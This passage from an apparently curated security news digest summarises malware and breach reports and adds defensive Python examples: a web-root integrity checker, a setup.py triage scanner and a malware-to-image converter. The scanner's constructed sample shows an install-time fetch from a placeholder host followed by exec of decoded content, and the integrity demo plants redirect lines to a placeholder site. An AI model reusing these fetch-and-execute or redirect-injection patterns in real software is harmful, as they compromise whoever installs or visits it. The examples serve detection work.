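        print(f"line {number}: IPFS content {cid}")
```

    Because the same CID can be fetched through any public gateway or the native scheme, keying on the CID rather than on a gateway hostname lets one rule cover a campaign that rotates gateways.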

    The Record reports "Cisco: InterPlanetary File System Seeing 'Widespread' Abuse by Hackers"

  • news

    Visible to the public "Malware Redirects 15,000 Sites in Malicious SEO Campaign"

    Security researchers at Sucuri have recently spotted an intriguing malware campaign designed to increase the search engine rankings of spam websites under the control of threat actors. Over 15,000 WordPress and other sites have been redirected to the spam Q&A sites. The researchers noted that the hackers are using modified WordPress PHP files and, in some cases, their own PHP files to achieve the redirects, with targeted sites on average containing 100 infected files each. The destination spam sites, of which the researchers have so far found 14, have their servers hidden behind a CloudFlare proxy. The researchers noted that the sites seem to be using the same Q&A pattern and are built using the Question2Answer (Q2A) open source Q&A platform. According to their website, this platform is currently powering over 24,500 sites in 40 languages. The researchers stated that the attackers' spam sites are populated with various random questions and answers found to be scraped from other Q&A sites. Many of them have cryptocurrency and financial themes. The researchers noted that although no malicious activity has been detected on these spam sites yet, the actors behind this campaign could "arbitrarily add malware" to them or redirect visitors again to malicious third-party sites. The researchers stated that it is possible that these bad actors are simply trying to convince Google that real people from different IPs using different browsers are clicking on their search results. This technique artificially sends Google signals that those pages are performing well in search. The researchers noted that this theory is backed by the fact that the second level domains of the Q&A sites "seem to belong" to the same individuals. According to the researchers, the campaign is somewhat unusual in that only 13% of all SEO spam infections are classified as a malicious redirect.
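
    The two artefacts Sucuri describes, modified core PHP files and attacker-supplied PHP files dropped into the site, are exactly what a hash baseline comparison surfaces. The following is an added example for this digest, not Sucuri's tooling: it snapshots a web root, diffs it against a known-good baseline, and narrows the additions to server-side files in locations that should not gain new PHP. The site tree, the tampering and the location heuristic are constructed and built in a temporary directory so the example runs on its own.

```python
"""Compare a web root against a known-good SHA-256 baseline.

Added example for this digest, not Sucuri's tooling.  The WordPress-like tree,
the tampering and the 'suspicious location' heuristic are constructed.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = sha256_of(full)
    return result


def compare(baseline, current):
    """Return (modified, added, missing) relative paths, each sorted."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    return modified, added, missing


def suspicious_additions(added):
    """Keep new PHP files in places that should never gain executable code.

    Assumed heuristic: wp-includes/ is core code and uploads/ should only hold
    media.  Tune the prefixes for the site being checked.
    """
    return [p for p in added
            if p.endswith(".php") and (p.startswith("wp-includes/") or "/uploads/" in p)]


def build_demo():
    """Construct a tiny site, baseline it, tamper with it, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, content):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(content)

        write("index.php", "<?php require 'wp-blog-header.php';\n")
        write("wp-includes/functions.php", "<?php function wp_hello() {}\n")
        write("wp-content/uploads/2022/photo.jpg", "not really a jpeg\n")
        baseline = snapshot(root)

        # Constructed tampering modelled on the campaign: a redirect appended
        # to a core file and a new PHP file dropped under uploads.
        write("wp-includes/functions.php",
              "<?php function wp_hello() {}\nheader('Location: https://spam.example/');\n")
        write("wp-content/uploads/2022/cache.php",
              "<?php header('Location: https://spam.example/');\n")

        modified, added, missing = compare(baseline, snapshot(root))
        return {"modified": modified, "added": added, "missing": missing,
                "suspicious": suspicious_additions(added)}


if __name__ == "__main__":
    print(build_demo())
```

    In production the baseline would come from the vendor's published checksums for the installed version plus a signed snapshot of theme and plugin files, and the comparison would run on a schedule so that a redirect injected into a core file is caught before search engines start following it.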

    Infosecurity reports: "Malware Redirects 15,000 Sites in Malicious SEO Campaign"

  • news

    Visible to the public "Malicious 'Cloud9' Chrome Extension Operates Like a Remote Access Trojan"

    Researchers have discovered the "Cloud9" malicious Chrome browser extension, which steals information available during a browser session and then installs malware to take control of the entire device. Cloud9 behaves like a Remote Access Trojan (RAT) and performs at least ten different types of malicious activities, including cookie stealing, keylogging, Layer 4/Layer 7 hybrid attacks, and OS and browser detection for next-stage payloads, according to the Zimperium zLabs team. The malware was also said to have originated from the Keksec malware group, which was founded in 2016 by botnet actors. This organization is best known for its Distributed Denial-of-Service (DDoS) attacks, mining-based malware, and botnets. The ability of this malware to avoid existing endpoint detection systems is particularly concerning, according to Bud Broomhead, CEO of Viakoo. As Broomhead points out, this is similar to how threat actors have targeted Internet of Things (IoT) devices and Operational Technology (OT) systems, which are not supported by traditional Information Technology (IT) security solutions. Many browsers are used as interfaces to OT equipment, especially to access management and control consoles. This could be a way for IoT/OT devices to be exploited by malicious actors. According to John Bambenek, Netenrich's principal threat hunter, this malware primarily exploits older browser vulnerabilities, so security teams should keep browsers patched and updated. However, any functionality or extension added to the browser, as well as configuration changes, can have serious security implications. The browser configuration should be tightly controlled and only allow the installation of specific browser extensions. This article continues to discuss the Cloud9 malicious Chrome browser extension observed stealing session information and then installing malware to take control of the device.

    SC Magazine reports "Malicious 'Cloud9' Chrome Extension Operates Like a Remote Access Trojan"

  • news

    Visible to the public "Some 98% of Global Firms Suffer Supply Chain Breach in 2021"

    According to new research by BlueVoyant, just 2% of global organizations didn't suffer a supply chain breach last year. The researchers noted that visibility into cyber risk is getting harder as these ecosystems expand. The researchers polled 2100 C-level execs with responsibility for supply chain and cyber risk management from companies with 1000+ employees to compile its study. The researchers found that the top challenges that respondents face include: awareness internally that third-party suppliers are part of their cybersecurity posture, meeting regulatory requirements and ensuring third-party cybersecurity compliance, and working with third-party suppliers to improve their posture. The researchers noted that supply chains are growing and that the number of firms with over 1000 suppliers increased from 38% in 2021's study to 50%. The researchers stated that although 53% of organizations audited or reported on supplier security more than twice annually, 40% still rely on suppliers to ensure security levels are sufficient. The researchers noted that this means they have no way of knowing if an issue arises with a supplier. Worse, 42% admitted that if they do discover an issue in their supply chain and inform their supplier, they cannot verify that the issue was resolved. The researchers stated that just 3% of the respondents monitor their supply chain daily, although the number of respondents using security ratings services to enhance visibility and reduce cyber risk increased from 36% last year to 39% in this year's study.

    Infosecurity reports: "Some 98% of Global Firms Suffer Supply Chain Breach in 2021"

  • news

    Visible to the public "Security 'Sampling' Puts US Federal Agencies at Risk"

    Titania has released an independent research report investigating the impact of exploitable misconfigurations on network security in the US federal government. According to the study, "The Impact of Exploitable Misconfigurations on the Security of Agency Networks and Current Approaches to Risk Mitigation in the US Federal Government," network professionals report that they are meeting their security and compliance practices, but the data indicate that risk is still high and, according to the report's findings, is likely to cost billions of dollars yearly. The research revealed that federal government respondents were the only sector representatives who stated that they assessed firewall configurations; their network checks did not include switches or routers. As a result, the agencies are sampling the security of their network device fleets. According to zero trust best practice, continuous assessment of all devices is critical for preventing intrusion and inhibiting lateral movement across networks. Sampling is a risky approach to configuration security that exposes organizations to the risk of configuration drift bringing networks down. Furthermore, the survey found that the inability to prioritize risk (81 percent) and inaccurate automation (44 percent) are the top two challenges for federal government respondents in meeting their enterprise security and external compliance requirements. Federal respondents also revealed that financial resources dedicated to mitigating network configuration risks, which currently account for around 3.4 percent of the total IT budget, are a constraint in configuration management. This article continues to discuss Titania's findings regarding the impact of exploitable misconfigurations.

    Help Net Security reports "Security 'Sampling' Puts US Federal Agencies at Risk"

  • news

    Visible to the public "New Hacking Group Uses Custom 'Symatic' Cobalt Strike Loaders"

    'Earth Longzhi,' a previously unknown Chinese Advanced Persistent Threat (APT) hacking group, targets organizations in East Asia, Southeast Asia, and Ukraine. The threat actors have been active since at least 2020, planting persistent backdoors on victims' systems using customized versions of Cobalt Strike loaders. According to a new Trend Micro report, Earth Longzhi shares techniques, tactics, and procedures (TTPs) with 'Earth Baku,' both of which are considered subgroups of the state-backed hacking group APT41. The report by Trend Micro shows two Earth Longzhi campaigns, the first of which took place between May 2020 and February 2021. During that time, the hackers targeted several Taiwanese infrastructure companies, a Chinese bank, and a Taiwanese government organization. The hackers used the custom Cobalt Strike loader 'Symatic,' which has a sophisticated anti-detection system, in this campaign. It is capable of removing Application Programming Interface (API) hooks from 'ntdll.dll,' obtaining raw file content, and replacing the in-memory ntdll image with an unmonitored copy. To obfuscate the chain, it can also spawn a new process for process injection and masquerade the parent process. Furthermore, it has the ability to inject a decrypted payload into the newly created process. This article continues to discuss the new Earth Longzhi hacking group using custom Symatic Cobalt Strike loaders.

    Bleeping Computer reports "New Hacking Group Uses Custom 'Symatic' Cobalt Strike Loaders"

  • news

    Visible to the public "Patch ASAP: Critical Citrix, VMware Bugs Threaten Remote Workspaces With Takeover"

    Citrix and VMware products have critical authentication-bypass vulnerabilities, threatening devices running remote workspaces with a complete takeover, the vendors have warned. Citrix's CVE-2022-27510 critical bug, with a CVSS vulnerability-severity score of 9.8 out of 10, enables unauthenticated access to Citrix Gateway when the appliance is used as a Secure Sockets Layer (SSL) Virtual Private Network (VPN) solution. In that configuration, it provides access to internal company applications via the Internet from any device, and it provides Single Sign-On (SSO) across applications and devices. Therefore, a successful attacker could easily gain initial access, then burrow deeper into an organization's cloud footprint and wreak havoc across the network due to the flaw. This article continues to discuss the critical Citrix and VMware vulnerabilities threatening remote workspaces.

    Dark Reading reports "Patch ASAP: Critical Citrix, VMware Bugs Threaten Remote Workspaces With Takeover"

  • news

    Visible to the public "Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File"

    A malicious package found on the Python Package Index (PyPI) was discovered using a steganographic trick to conceal malicious code within image files. According to researchers at Check Point, the package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and is described as a "Core lib for REST API." It has since been removed. Apicolor, like other recently discovered rogue packages, hides its malicious behavior in the setup script, which is used to specify metadata about the package, such as its dependencies. This takes the form of a second package called "judyb," as well as a seemingly innocuous PNG file called "8F4D2uF.png," which is hosted on Imgur, an image-sharing service. This article continues to discuss the discovery of a PyPI package hiding malicious code behind image files.
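
    The apicolor case is the recurring pattern of malicious behaviour living in setup.py, which runs at install time and legitimately needs nothing beyond package metadata. The following is an added example for this digest, not Check Point's tooling: a static triage pass over a setup script's syntax tree that reports imports of network, process and decoding modules and calls to dynamic execution primitives, none of which belong in a metadata script. The two setup scripts it is run on are constructed; the "suspicious" one mirrors the shape the article describes (a remote image fetched and decoded at install time) against a non-routable example host.

```python
"""Static triage of setup.py for install-time behaviour that metadata does not need.

Added example for this digest, not Check Point's tooling.  Both sample scripts
below are constructed.
"""
import ast

# Modules and call roots that a setup script has no reason to touch (assumed list).
SUSPICIOUS_MODULES = {"urllib", "urllib.request", "requests", "http.client",
                      "socket", "subprocess", "base64", "ctypes"}
SUSPICIOUS_CALL_ROOTS = ("urllib", "requests", "subprocess", "base64", "ctypes", "socket", "http")
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__"}


def _call_name(func):
    """Dotted name of a call target, e.g. 'requests.get'; None when not a plain name."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _call_name(func.value)
        return base + "." + func.attr if base else None
    return None


def _module_is_suspicious(name):
    return name in SUSPICIOUS_MODULES or name.split(".")[0] in SUSPICIOUS_MODULES


def triage_setup_script(source):
    """Return sorted findings ('import:<module>' / 'call:<name>') for a setup.py text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _module_is_suspicious(alias.name):
                    findings.add("import:" + alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if _module_is_suspicious(node.module):
                findings.add("import:" + node.module)
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.add("call:" + name)
            elif name and name.split(".")[0] in SUSPICIOUS_CALL_ROOTS:
                findings.add("call:" + name)
    return sorted(findings)


# Constructed: a normal metadata-only setup script.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo", version="1.0", packages=find_packages())
'''

# Constructed: the shape described above, a remote image pulled and decoded
# at install time (host is a reserved, non-routable example name).
SUSPICIOUS_SETUP = '''
from setuptools import setup
import base64, urllib.request
payload = urllib.request.urlopen("https://example.invalid/image.png").read()
exec(base64.b64decode(payload))
setup(name="demo", version="1.0")
'''


if __name__ == "__main__":
    print("benign:", triage_setup_script(BENIGN_SETUP))
    print("suspicious:", triage_setup_script(SUSPICIOUS_SETUP))
```

    This is a triage aid rather than a verdict: obfuscated scripts can hide the same behaviour behind getattr or string building, so any finding, or any setup.py that fails to parse, is a reason to install the package only in an isolated environment with network access denied.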

    THN reports "Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File"

  • news

    Visible to the public "A 5G-Enabled AI-Based Malware Classification System for the Next Generation of Cybersecurity"

    The Industrial Internet of Things (IIoT) is increasingly gaining popularity due to its ability to create communication networks between various components of an industry and usher in the new Industry 4.0 revolution. IIoT, powered by wireless 5G connectivity and Artificial Intelligence (AI), can analyze critical problems and provide solutions to improve the operational performance of manufacturing, healthcare, and other industries. The Internet of Things (IoT) is highly user-centric because it connects TVs, voice assistants, refrigerators, and other devices, whereas IIoT is concerned with improving the health, safety, or efficiency of larger systems, bridging hardware and software, and performing data analysis to provide real-time insights. While IIoT has many benefits, it also has some drawbacks, such as security threats in the form of attacks attempting to disrupt the network or extract resources. As IIoT becomes more prevalent in industries, it is critical to develop an efficient system to address such security concerns. A multinational team of researchers led by Professor Gwanggil Jeon at Incheon National University wanted to address this challenge. They explored the world of 5G-enabled IIoT to investigate its threats and devise a novel solution. The team presented an AI- and deep learning-based malware detection system for 5G-assisted IIoT systems in a recent review published in IEEE Transactions on Industrial Informatics. According to Professor Jeon, security threats can lead to operational or deployment failure in IIoT systems, resulting in high-risk situations. Therefore, they decided to investigate and compare existing research, identify gaps, and propose a new design for a security system capable of detecting and classifying malware attacks in IIoT systems. The team's system analyzes malware using a method called grayscale image visualization with a deep learning network. It then uses a multi-level Convolutional Neural Network (CNN) architecture to categorize the malware attack into different types. This security system is also integrated with 5G to enable low latency and high throughput sharing of real-time data and diagnostics. When compared to traditional system architectures, the new design achieved 97 percent accuracy on the benchmark data set. This article continues to discuss the research and development behind the new 5G-enabled AI-based malware classification system.
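
    "Grayscale image visualization" means reading a binary as a raster in which every byte is one pixel intensity, so that a CNN can classify the texture instead of parsing the file format. The block below is an added example for this digest, not the authors' code, showing the conversion step in plain Python: the width schedule (rows get wider as files get larger), the zero padding of the last row, and a nearest-neighbour resize to the fixed input size a CNN expects. The width schedule is the common file-size-based convention from malware-visualisation work and the sample bytes are constructed; both are assumptions, not details from the paper.

```python
"""Byte-to-grayscale conversion used by image-based malware classifiers.

Added example for this digest, not the authors' code.  The width schedule is
an assumed convention and SAMPLE_BINARY is constructed.
"""


def pick_width(size):
    """Row width in pixels chosen from file size (assumed schedule)."""
    if size < 10 * 1024:
        return 32
    if size < 30 * 1024:
        return 64
    if size < 60 * 1024:
        return 128
    if size < 100 * 1024:
        return 256
    if size < 200 * 1024:
        return 384
    if size < 500 * 1024:
        return 512
    if size < 1000 * 1024:
        return 768
    return 1024


def bytes_to_grayscale(data, width=None):
    """Return (rows, width); rows is a list of equal-length lists of pixels 0-255.

    Each byte becomes one pixel.  The final row is zero-padded so the raster
    is rectangular.
    """
    if width is None:
        width = pick_width(len(data))
    rows = []
    for offset in range(0, len(data), width):
        row = list(data[offset:offset + width])
        row.extend([0] * (width - len(row)))
        rows.append(row)
    return rows, width


def resize_nearest(rows, out_h, out_w):
    """Nearest-neighbour resample to the fixed size a CNN input layer expects.

    Plain Python so the example runs without NumPy or PIL.
    """
    in_h, in_w = len(rows), len(rows[0])
    return [[rows[y * in_h // out_h][x * in_w // out_w] for x in range(out_w)]
            for y in range(out_h)]


def write_pgm(rows, path):
    """Save the raster as binary PGM (P5) so it can be opened in any image viewer."""
    height, width = len(rows), len(rows[0])
    with open(path, "wb") as fh:
        fh.write(b"P5\n%d %d\n255\n" % (width, height))
        for row in rows:
            fh.write(bytes(row))


# Constructed stand-in for an executable: a short header, a zero-filled region
# (like section padding), readable text and a byte ramp, so the raster shows
# visibly different textures in each region.
SAMPLE_BINARY = (b"MZ" + b"\x00" * 30
                 + b"This program cannot be run in DOS mode."
                 + bytes(range(0, 256, 3)))


if __name__ == "__main__":
    rows, width = bytes_to_grayscale(SAMPLE_BINARY)
    print(f"{len(SAMPLE_BINARY)} bytes -> {len(rows)} rows x {width} px")
    write_pgm(resize_nearest(rows, 64, 64), "sample.pgm")
```

    The same conversion applied to two samples of one family produces visually similar rasters because shared code and data layout become shared texture, which is what the CNN stage in the paper exploits.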

    Nanowerk News reports "A 5G-Enabled AI-Based Malware Classification System for the Next Generation of Cybersecurity"

  • news

    Visible to the public "Researchers Improve Security for Smart Systems"

    Sensors collect and share large amounts of data to help decision-makers in an increasingly connected and smart world. Through these sensors, people receive ever-increasing amounts of data in ways that can be difficult to decipher. A group of researchers at Washington State University developed a method for statistically analyzing such complex sensor data, allowing computer algorithms that make data-based decisions to be more resilient and capable of dealing with minor errors. The research has many applications, including mobile health, smart homes, the electric power grid, and agriculture. The work, led by Jana Doppa, Huie-Rogers Endowed Chair Associate Professor of Computer Science, is said to be a significant and novel contribution to the security of Machine Learning (ML) systems. ML algorithms are increasingly being used in various applications, such as smart grid management and smart agriculture. For example, they could be used to collect data from sensors in farm fields and weather instruments to learn and predict optimal watering times. Many smart applications collect data in the form of a time series, which is a data set that tracks a sample over time and provides a series of timestamp data points. Although computers collect data and generate time series lines and charts, people are not well suited to read and comprehend them. In addition, they may overlook minor but significant changes, even those that are done maliciously. As more systems incorporate ML, the security of those systems has been an understudied issue, according to Doppa. Adversarial attacks can occur when an attacker gains access to smart sensors and then causes small perturbations in the data that are undetectable to an observer. The perturbations can cause the prediction and decision-making processes to fail. The WSU researchers added a security layer to their ML algorithm to detect potential disturbances and determine how statistically likely they are to occur, providing system resilience and preventing major failures. This article continues to discuss the WSU researchers' work to improve the security of smart systems.

    WSU reports "Researchers Improve Security for Smart Systems"

  • news

    Visible to the public "George Mason University Hackathon Winners Unveil Solutions to Fight Global Counterfeiting"

    The winners of the 2022 Bring Down Counterfeiting Public Policy Hackathon, held November 5 at the Homeland Security Investigations Innovation Lab in Arlington, were announced by George Mason University's Terrorism, Transnational Crime and Corruption Center (TraCCC). The event, in which US and international academic institutions, companies, and other affiliations participated, presented the challenge of developing innovative ideas to improve public-private collaborations in the face of the industry-wide global challenge of counterfeiting. For over two decades, the National Intellectual Property Rights Coordination Center (IPR Center), in collaboration with industry and brand owners, has led the effort in the government's Intellectual Property (IP) theft prevention response and has played a significant role in policing the sale and distribution of counterfeit goods on websites, social media, and eCommerce marketplaces. One of 11 teams in the final, Team Hypercube, won the $20,000 first prize for its concept of a national counterfeiting index via an Artificial Intelligence (AI)-powered blockchain that would allow federal, state, and local law enforcement to share information as well as consumers to verify the authenticity of a product through their phones. Team Nimbus took second place and $15,000 for proposing the development of a Chrome extension that can prevent the consumption of counterfeit medicine by focusing on counterfeit pharmacies. A-Capp Team #1 proposed creating a central database to help law enforcement and private businesses track individuals and factories that manufacture or sell counterfeit items. The Spartan Solution won the $5,000 student prize for demonstrating a cipher-based solution to combat counterfeit listings on eCommerce sites before they reach consumers. The $2,000 crowd source prize went to Team G.I.N., which detailed the creation of a network accessible via QR code that will allow everyone to differentiate between genuine and counterfeit goods. The submissions were scored by an expert panel of judges based on their potential impact, scalability, creativity, and design. This article continues to discuss the winning proposed solutions of the 2022 Bring Down Counterfeiting Public Policy Hackathon.

    ICE reports "George Mason University Hackathon Winners Unveil Solutions to Fight Global Counterfeiting"

  • news

    Visible to the public "Insider Risk on the Rise: 12% of Employees Take IP When Leaving Jobs"

    Security researchers Dtex conducted a study on the top insider risk trends for 2022 and discovered that twelve percent of all employees take sensitive intellectual property (IP) with them when they leave an organization. Some of the IP taken from organizations include customer data, employee data, health records, sales contacts, and more. The researchers noted that more and more applications are providing new features that make data exfiltration easier. The security researchers also saw a 55% increase in unsanctioned application usage, including those making data exfiltration easier by allowing users to maintain clipboard history and sync IP across multiple devices. The researchers noted that Bring Your Own Applications (BYOA) or Shadow IT can be a source of intelligence for business innovation, but they pose a significant risk if the security team has not tested these tools thoroughly. The researchers also discovered a 20% increase in resignation letter research and creation from employees taking advantage of the tight labor market to switch positions for higher wages. The researchers also witnessed a 200% increase in unsanctioned third-party work on corporate devices from a high prevalence of employees engaged in side gigs.

    Infosecurity reports: "Insider Risk on the Rise: 12% of Employees Take IP When Leaving Jobs"

  • news

    Visible to the public "'Justice Blade' Hackers Are Targeting Saudi Arabia"

    The 'Justice Blade' threat actor group published leaked data from Smart Link BPO Solutions, an outsourcing Information Technology (IT) vendor that works with major enterprises and government agencies in Saudi Arabia and other Gulf Cooperation Council (GCC) countries. The malicious actors claim to have stolen a large amount of data, including Customer Relationship Management (CRM) records, personal information, emails, contracts, and account credentials. Justice Blade also set up a Telegram account with a private communication channel. Based on the attackers' screenshots and video, the incident could have occurred as a result of a targeted network intrusion impacting Active Directory (AD) as well as internal applications and services. They also released screenshots of active Remote Desktop Protocol (RDP) sessions and Office 365 communications between various companies in the region, along with several lists of users containing over 100,000 records likely related to FlyNas (airline company) and SAMACares (initiative managed by Saudi Arabia Central Bank). According to Resecurity, Inc., which protects major Fortune 500 companies, the data breach could be one of the region's first significant supply chain cybersecurity incidents due to an overlap between an enterprise and the government sector. Threat actors could use the stolen data to target other companies and individuals of interest. Multiple leaked credentials belonging to Smart Link BPO Solutions have previously been identified in the dark web and various underground marketplaces in the TOR network, which could be used by the Justice Blade group to conduct successful cyberattacks. The information currently available shows that the announcement of the attack began with the defacement of a corporate website around November 2 and progressed as a "hack-and-leak" operation. Before that, on October 30, the victim company presumably detected Metasploit Framework activity, which was deployed by the bad actors post-compromise. According to leaked company communications, the compromised account of an employee was most likely used to carry out the attack. There is no evidence that the attack was financially motivated since there have been no ransom demands registered. This article continues to discuss the Justice Blade group publishing leaked data from Smart Link BPO Solutions.

    Security Affairs reports "'Justice Blade' Hackers Are Targeting Saudi Arabia"

  • news

    Visible to the public "CISA, NSA and Industry Outline Security Responsibilities of Software Suppliers"

    According to guidance recently released by the National Security Agency (NSA) and the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA), software suppliers have unique responsibilities to maintain the efficient delivery of their products while having to consider security risks. The NSA noted that prevention is often considered the software developer's responsibility. The software developer is required to develop and deliver code securely, verify third-party components, and harden the build environment. However, the NSA points out that the supplier has a critical role in ensuring the security and integrity of software since the software vendor is responsible for communicating between the customer and the software developer. Through this relationship, additional security features are implemented through contractual agreements, software releases and updates, vulnerability notifications, and mitigations. The document created for software vendors is the first in a series of three. The Enduring Security Framework (ESF), which includes US government officials and industry representatives from the Information Technology (IT), communications, and defense sectors, released developer guidance in September and plans to address software consumers' security responsibilities next. Security best practices for software producers and users have already been articulated in the National Institute of Standards and Technology (NIST) Secure Software Development Framework, which NIST used to meet its obligations under Executive Order 14028 to provide guidance to federal agencies. In May 2021, President Joe Biden issued the order in response to the SolarWinds incident, in which customers of the ubiquitous IT management firm were compromised after installing what appeared to be a routine update. The hackers gained unauthorized access to SolarWinds' delivery mechanism and disguised their malware as new code. According to the document, this series will help foster communication between these three different roles and among cybersecurity professionals, which may facilitate increased resiliency and security in the software supply chain process. This article continues to discuss the new guidance that tries to distinguish between the security duties of software developers, suppliers, and consumers.

    NextGov reports "CISA, NSA and Industry Outline Security Responsibilities of Software Suppliers"

  • news

    Visible to the public "Over Thirty Arkansas Counties Impacted by Cyberattack"

    A cyberattack over the weekend is causing county offices across the state of Arkansas to go offline or temporarily close. Each affected county uses Apprentice Information Systems (AIS) for its online servers. The Rogers-based business would not say how many counties it serves, but several affected county offices said they believe it could easily be up to half the state. By calling 20 central Arkansas counties before they closed on Monday and searching the Assessor's Apprentice Information Systems User Group website, it was found that three counties (Garland, Hot Spring, and Jefferson) used a different provider and were unaffected, and three counties (Arkansas, Pike, and Van Buren) were without internet. Overall, 31 counties are confirmed to have at least one office serviced by AIS with servers offline. A spokesperson at Apprentice Information Systems stated that, depending on location, the outage is stopping or limiting several services: users "cannot assess, pay taxes, file deeds, search for deeds, obtain marriage licenses, etc." The company is currently investigating the incident.

    reports: "Over Thirty Arkansas Counties Impacted by Cyberattack"

  • news

    Visible to the public "Iranian Actors Targeting Healthcare via Spear-Phishing, Vulnerability Exploit"

    The US Department of Health and Human Services' Health Sector Cybersecurity Coordination Center (HC3) has issued a warning about the threat posed by Iranian nation-state actors to the healthcare sector; in June 2021, the FBI foiled an Iranian-backed cyberattack on Boston Children's Hospital. The white paper describes the groups, with particular emphasis on the healthcare sector, as well as key mitigations and commonly exploited vulnerabilities. Provider entities are encouraged to review the insights to ensure that the necessary security measures are in place. Iran and North Korea continue to conduct sophisticated intrusions against US targets. The HC3 report, building on previous efforts, notes that Iranian threat actors are historically risk-averse and notorious for wiper malware as well as retaliatory attack strategies. These actors frequently conduct spear phishing, Distributed Denial-of-Service (DDoS) attacks, sensitive data theft, website defacement, and social media-driven operations. Furthermore, Iran has signed cybersecurity and information technology agreements with both Russia and China, expanding its cyber capabilities and potential impact. Four groups heavily target the healthcare sector and medical researchers, with spear phishing being the most common initial intrusion vector; one group often uses healthcare-related lures, as well as job postings, password policies, or resumes. HC3 is most concerned about these groups' ability to use fake personas that realistically mimic legitimate entities, including believable CC'd email addresses that are difficult for users to detect. Email is a common pivot point for attacks in healthcare, but it is also one of the most difficult defense challenges. Providers should use the HC3 white paper to assess the current state of their email program by reviewing current processes. For providers to review, the insights detail the three phases of an attack as well as the aftermath. The report also includes a list of commonly exploited vulnerabilities that should be patched or segmented from the network right away. This article continues to discuss the threat Iranian nation-state actors pose to the healthcare sector.

    SC Magazine reports "Iranian Actors Targeting Healthcare via Spear-Phishing, Vulnerability Exploit"

  • news

    Visible to the public "Conti Affiliates Black Basta, BlackByte Continue to Attack Critical Infrastructure"

    Security researchers at eSentire's Threat Response Unit (TRU) have found that between the end of February and mid-July 2022, 81 victim organizations were listed on the BlackByte and Black Basta data leak sites. Of those, 41% were based in Europe, and many are part of critical infrastructure sectors, including energy, government, transportation, pharmaceuticals, facilities, food, and education. The remaining 59% were primarily located in the US and included a manufacturer of agricultural machinery, a small regional grocery chain, and several construction firms. The researchers stated that what stands out is that the US companies attacked by these two ransomware gangs during this time frame are, for the most part, not part of critical infrastructure sectors, whereas the European victims definitely are, spanning transportation, energy, government facilities, pharmaceuticals, food, and education. The researchers stated that the Conti ransomware group appeared to shut down in May 2022 but in fact moved its operation into other ransomware brands, including Black Basta and BlackByte. Originally, the Conti group, which is known to have Russian-state affiliations, tended to target critical infrastructure in Western, NATO-aligned countries, especially the US. However, in the summer of 2021, US President Joe Biden began applying pressure on Russian President Vladimir Putin, threatening sanctions and retaliation. To avoid losing ransom payments to sanctions and to avoid targeting by international law enforcement, Russian-based ransomware groups, especially Conti affiliates Black Basta and BlackByte, began rotating away from US targets towards other NATO-affiliated countries in Europe, the researchers noted.

    Infosecurity reports: "Conti Affiliates Black Basta, BlackByte Continue to Attack Critical Infrastructure"

  • news

    Visible to the public "Raspberry Worm Exposes Larger, More Complex Malware Ecosystem"

    Raspberry Robin has quickly evolved from a widely distributed worm that showed no post-infection activity into an active malware distribution platform, just a few months after Red Canary researchers first described it in May 2022. Microsoft has found new evidence that the Raspberry Robin worm is part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original spread via USB drives. Hands-on-keyboard attacks and human-operated ransomware activity follow these infections. Continuous monitoring of Raspberry Robin-related activity shows an active operation: nearly 3,000 devices in nearly 1,000 organizations received at least one Raspberry Robin payload-related alert in the last 30 days. The researchers found FakeUpdates malware being installed on Raspberry Robin-infected devices, leading to activity by DEV-0243, a ransomware-associated activity group that overlaps with EvilCorp. Raspberry Robin has also begun deploying IcedID, Bumblebee, and Truebot. By October, the researchers had observed Raspberry Robin in post-compromise activity linked to another actor, DEV-0950, which overlaps with the groups publicly tracked as FIN11/TA505. The DEV-0950 activity resulted in Cobalt Strike hands-on-keyboard compromises after a Raspberry Robin infection, sometimes with a Truebot infection in between the Raspberry Robin and Cobalt Strike stages, and Clop ransomware was then deployed, signaling a significant shift for this actor away from phishing and toward using Raspberry Robin to deliver payloads to existing infections. Because the cybercriminal economy is so intertwined, Microsoft speculates that the actors behind the malware delivered through Raspberry Robin, which is usually distributed by other means such as malicious ads or email, could be paying the Raspberry Robin operators for installs. This article continues to discuss the more complex malware ecosystem exposed by the Raspberry Robin worm.

    Security Boulevard reports "Raspberry Worm Exposes Larger, More Complex Malware Ecosystem"

  • news

    Visible to the public "Censinet, AHA, KLAS Partner On Healthcare Cybersecurity Benchmarking Study"

